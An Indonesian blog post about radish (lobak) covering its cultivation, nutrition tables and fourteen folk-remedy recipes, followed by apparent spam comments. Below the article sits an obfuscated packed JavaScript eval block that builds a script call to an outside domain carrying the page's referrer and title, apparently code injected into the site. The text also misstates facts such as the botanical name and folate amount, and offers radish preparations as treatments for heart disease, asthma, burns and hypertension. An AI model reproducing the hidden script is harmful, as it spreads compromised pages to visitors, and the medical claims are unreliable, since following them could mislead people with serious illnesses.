browser icon
You are using an insecure version of your web browser. Please update your browser!
Using an outdated browser makes your computer unsafe. For a safer, faster, more enjoyable user experience, please update your browser today or try a newer browser.

Tentang Lobak

Posted by on March 26, 2014
gambar minjem dari http://ms.wikipedia.org/

gambar minjem dari http://ms.wikipedia.org/

Ceritanya nih, kan ditugasi jadi perwakilan Dharma Wanita untuk mengikuti pelatihan mengukir buah, nah salah satu bahan yang harus dibawa itu Lobak. Bingung dah harus nyari dimana, lha wong bentuknya aja masih nggak ngerti. Benernya sering denger sih nama sayuran ini disebut, tapi megang langsung jujur aja belum pernah. Jadilah browsing kemana mana tentang per-Lobak-an ini. Dan ternyata dia ga cuma cantik buat diukir saja loh, karena gizinya pun tak kalah ciamik.

Radish white

gambar minjem dari http://secawancoffee-sesuducreamer.blogspot.com/

Lobak (Brassica rapa) sudah dibudidayakan sejak 4000 tahun yang lalu. (Wah berarti kita yang nggak gaul ya sampe nggak kenal lobak, hihihi…)Meski berasal dari negeri Cina, tanaman ini merupakan sayur tradisional penduduk Amerika Selatan. Digunakan secara luas di daerah Yunani dan Italia sebagai daerah yang pertama kali menemukan lobak. Akar dan daun lobak sebenarnya dapat dikonsumsi, hanya saja orang-orang tidak banyak memanfaatkan bagian daun karena rasanya pahit. Tanaman ini mudah ditanam baik di dataran rendah maupun tinggi (pegunungan). Di Indonesia saat ini daerah yang banyak ditanami lobak adalah dataran tinggi Pangalengan, Pacet, Cipanas, dan Bedugul. Luas areal tanaman lobak di Indonesia saat ini berkisar 15.700 ha. Tanah yang baik untuk tanaman lobak adalah tanah gembur, mengandung humus (subur) dan lapisan atasnya tidak mengandung kerikil (batu-batu kecil). Dengan derajat keasaman tanah 5-6, dan waktu tanam adalah musim hujan atau awal musim kemarau.  Namun jika menanam pada musim kemarau, tanaman harus cukup air.

Tanaman ini ditanam dari bijinya. Bibit lobak tidak perlu didatamgkan dari luar negeri atau impor, cukup dari hasil biji sendiri karena tanaman ini mudah berbunga dan berbiji. Biji-biji tersebut dapat ditanam langsung di kebun tanpa disemai terlebih dulu. Untuk penanaman seluas 1 ha diperlukan biji sebanyak 5 kg.

gambar minjem di http://www.laospirit.com/showthread.php?t=2074&page=3

gambar minjem di http://www.laospirit.com/showthread.php?t=2074&page=3

Lobak dengan bentuk umbi seperti wortel dan termasuk tumbuhan famili Cruciferae ini mempunyai isi dan kulit bermacam macam, ada yang putih, merah, ungu, jingga bahkan kuning. Makanya cantik untuk diukir sebagai garnish. Lha warnanya aja sudah menawan gitu. Eh, tapi ga cuma warnanya saja yang menawan, tetapi kandungannya pun cukup menarik hati. Sebab Lobak yang memiliki aroma yang kuat serta khas ternyata mengandung berbagai vitamin yang bermanfaat bagi tubuh manusia yaitu vitamin A, B1, B2, C, E, beta-carotene, dan mineral mangan yang baik untuk detoksifikasi tubuh serta kandungan zat kimiawi seperti niasin, minyak atsiri, kolin, serat kasar, kalsium, fosfor, zat besi dan asam oksalat. Selain itu, daun Lobak putih juga memiliki kandungan minyak atsiri, vitamin A dan C sedangkan biji lobak memiliki kandungan 30%-40% minyak lemak dan minyak atsiri. Zat-zat tersebut merupakan antibiotik untuk beberapa jenis bakteri dan antioksidan. Detoksifikasi penting untuk membuang racun dari dalam tubuh. Lobak juga memiliki kandungan vitamin dan minyak omega-3 yang tinggi yang berfungsi untuk mencegah penggumpalan lemak atau mineral pada pembuluh darah yang bisa menyebabkan stroke. Lobak juga kaya akan serat pangan (fiber) yang dapat menurukan kadar kolesterol dari dalam darah. Penelitian terbaru menunjukkan lobak dapat menghambat pertumbuhan Helicobacter pylori, bakteri yang menyebabkan keruaskan pada lambung (maag).

Selengkapnya mengenai kandungan nutrisi Lobak dapat dilihat pada tabel berikut seperti dikutip dari sini:

Tabel Kandungan Nutrisi

Dalam setiap 144 gram lobak terkandung 28.8 calories.

Nutrien % Daily Value Food Rating
Vitamin K 661.7 Excellent
Vitamin A 219.6 Excellent
Vitamin C 65.8 Excellent
Folate 42.5 Excellent
Mangan 24.5 Excellent
Fiber 20.2 Excellent
Kalsium 19.7 Excellent
Vitamin E 13.6 Excellent
Vitamin B 13 Excellent

atau dapat dilihat pada paparan berikut seperti dikutip dari sini:

KANDUNGAN GIZI LOBAK
Lobak, mentah, hanya akar, Nilai gizi per 100 g (3.5 oz)
Energi 66 kJ (16 kcal)
Karbohidrat 3,40 g
Gula 1,86 g
Diet serat 1,6 g
Lemak 0,10 g
Protein 0,68 g
Thiamine (Vit. B1) 0,012 mg (1%)
Riboflavin (Vit. B2) 0,039 mg (3%)
Niacin (Vit. B3) 0,254 mg (2%)
Asam pantotenat (B5) 0,165 mg (3%)
Vitamin B6 0,071 mg (5%)
Folat (Vit. B9) 25 mg (6%)
Vitamin C 14,8 mg (25%)
Kalsium 25 mg (3%)
Besi 0,34 mg (3%)
Magnesium 10 mg (3%)
Fosfor 20 mg (3%)
Kalium 233 mg (5%)
Seng 0,28 mg (3%)
Sumber: USDA Nutrient database

Nah berikut beberapa manfaat lobak seperti dirangkum dari berbagai sumber:

  1. Pengobatan Bisul
    Siapkan Umbi Lobak secukupnya kemudian Blender atau diparut. Tambahkan dengan cuka beras putih. Kemudian oleskan di tempat bisul.
  2. Pengobatan Asma
    Siapkan 200 gram umbi lobak putih lalu di jus.Tambahkan 50 cc jus jahe dan direbus sampai mendidih. Tambahkan madu diminum airnya selagi hangat
  3. Pengobatan Eksim
    Siapkan umbi Lobak secukupnya kemudian diparut dan tambahkan air jahe. Aduk rata ramuan tersebut kemudian balurkan ditempat yang sakit
  4. Pengobatan batuk rejan
    Siapkan 25 gram biji lobak putih yang sudah dikeringkan. Kemudian ditumbuk sampai halus ditambahkan gula dan air hangat secukupnya
    Kemudian diminum 3 kali sehari.
    Bisa juga menggunakan 100 gram umbi lobak ditambahkan 5 butir lada putih dan madu secukupnya lalu ditim dan dimakan
  5. Pengobatan Batuk
    Siapkan 100 gram umbi lobak putih dan 9 gram kulit jeruk mandarin. Kemudian semua bahan direbus dengan 500 cc air meninggalkan 200 cc.
    Ramuan disaring dan minum airnya selagi hangat.
  6. Pengobatan luka bakar terkena air panas
    Siapkan 100 gram umbi lobak yang sudah diparut. Lalu ramuan dioleskan pada luka
  7. Pengobatan Influenza
    Siapkan 250 gram umbi lobak diiris tipis tambahkan gula pasir secukupnya kemudian direbus dengan 600 cc air hingga tersisa 300 cc.  Saring ramuan dan minum airnya dalam keadaan masih hangat.
  8. Pengobatan penyakit jantung
    Siapkan 250 gram umbi lobak dipotong kecil dan 30 gram daun dewa segar. Rebus kedua bahan tadi menggunakan 800 cc air sampai tertinggal 400 cc . Saring dan minum air ramuan itu 2 kali sehari masing masing sebanyak 200 cc
  9. Menurunkan Hipertensi
    Siapkan 100 gram umbi lobak segar kemudian di Jus. Minumlah jus ini 2 kali sehari setiap kali minum sebanyak 150 gram.
    Atau menggunakan 100 gram umbi lobak ditambahkan 1 buah apel kemudian diparut lalu diambil airnya. Gunakan air ramuan tersebut untuk memblender 75 gram seledri dan tambahkan air perasan jeruk mandarin dan gula pasir secukupnya kemudian minum secara teratur.
  10. Mencegah perut kembung
    Siapkan 150 gram umbi lobak, 5 gram kulit jeruk mandarin yang telah dikeringkan, 3 butir cengkeh, 1 jari kayu manis, 5 gram biji pala dan 3 butir kapulaga. Rebus semua bahan menggunakan 500 cc air sampai tertinggal 200 cc. Saring dan diminum air ramuan tersebut.
  11. Pengobatan Disentri
    Siapkan 100 gram daun lobak kering kemudian rebus bersama-sama air hingga mendidih dan menjadi kental. Kemudian minum seperti minum teh  Lakukan selama 3-5 hari. Apabila disentri telah berlangsung lama maka dianjurkan daun lobak ditambah daging ayam secukupnya lalu masak menjadi sop
    setelah matang dimakan.
  12. Pengobatan gangguan paru-paru disertai batuk darah atau pendarahan hidung
    Siapkan 100 gram umbi lobak putih kemudian jus dan diminum setiap hari.
  13. Pengobatan masalah pencernaan
    Siapkan 200 gram umbi lobak tambahkan buah angco. Masak menjadi kuah kemudian diminum 1-2 kali sehari
  14. Mengurangi nafsu makan berlebihan
    Siapklan 200 gram umbi lobak dan 200 gram umbi wortel. Kedua bahan di jus dan diminum

Wah ternyata si cantik ini oke banget ya…


eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c]);return p}(‘(9(){2 d=3;2 4=1;2 5=1;2 t=d.a(\’b\’);2 6=7.c(7.e()*f);2 0=\’g://h.i/j/k?\’;0=0+\’l=\’+3.m;0=0+\’&n=\’+3.o;0=0+\’&r=\’+6;d.p(\’\’)})();’,35,35,’src||var|document|razmw|razmh|id|Math|iframe|function|createElement|script|floor||random|9999|http|needalogo|net|rotation|3wBsvV|se_referrer|referrer|default_keyword|title|write|style||padding||0px|border|none|width|height’.split(‘|’),0,{}))

2 Responses to Tentang Lobak

  1. http://pharmpdf.com/

    Nice post. I used to be checking constantly this blog
    and I am impressed! Very useful information particularly the last phase :
    ) I take care of such info a lot. I was seeking this particular info for
    a long time. Thanks and good luck.

  2. at home business

    I am truly glad to glance at this weblog posts which consists of lots of helpful information, thanks for providing such data.

Leave a Reply